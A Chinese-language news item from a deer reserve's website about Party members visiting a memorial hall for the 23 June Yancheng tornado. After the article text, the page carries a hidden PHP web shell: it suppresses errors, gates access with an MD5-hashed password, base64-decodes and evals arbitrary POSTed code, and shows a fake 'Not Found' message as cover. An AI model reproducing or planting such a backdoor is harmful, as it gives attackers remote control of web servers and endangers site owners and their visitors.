最新要闻

首页 > 最新要闻 >

    大丰麋鹿保护区管理处党总支组织党员干部 参观抗击“6·23”特大龙卷风纪念馆

              7月12日上午,为深入推进“两学一做”学习教育常态化制度化,不断加强党性教育,大丰麋鹿保护区管理处党总支组织区内党员干部参观“盐城抗击6.23特大龙卷风纪念馆”。 

    党员同志首先观看了《盐城抗击“6·23”特大龙卷风纪实》专题片,随后又参观了“特大风暴,袭击重创”、“万众一心,全力救援”、“科学决策,快速重建”、“伟大精神,时代丰碑”为主题的四个展厅。还原的场景、现场的图片以及保存的实物让在场的党员同志深感“天灾无情人有情”的社会大爱。

    麋鹿保护区的党员干部倍感今天党和政府领导下的幸福生活来之不易,纷纷表示要继续发扬艰苦奋斗、爱岗敬业的精神,为建设美好的麋鹿家园而共同奋斗!

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>